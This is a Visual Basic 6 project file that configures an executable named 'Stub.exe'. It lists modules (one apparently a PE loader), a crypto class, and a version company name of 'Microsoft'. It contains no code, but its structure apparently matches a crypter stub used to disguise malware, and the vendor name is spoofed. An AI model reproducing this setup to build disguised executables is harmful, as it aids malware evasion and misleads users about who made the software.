Type=Exe
Module=mMain; mMain.bas
Module=ooo; mPEL.bas
Class=CCrypto; ..\CCrypto.cls
Module=Module1; Module2.bas
Startup="Sub Main"
HelpFile=""
Title="Stub"
ExeName32="Stub.exe"
Path32="..\..\.."
Command32=""
Name="Stub"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="Microsoft"
CompilationType=-1
OptimizationType=1
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=-1
BoundsCheck=-1
OverflowCheck=-1
FlPointCheck=-1
FDIVCheck=-1
UnroundedFP=-1
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
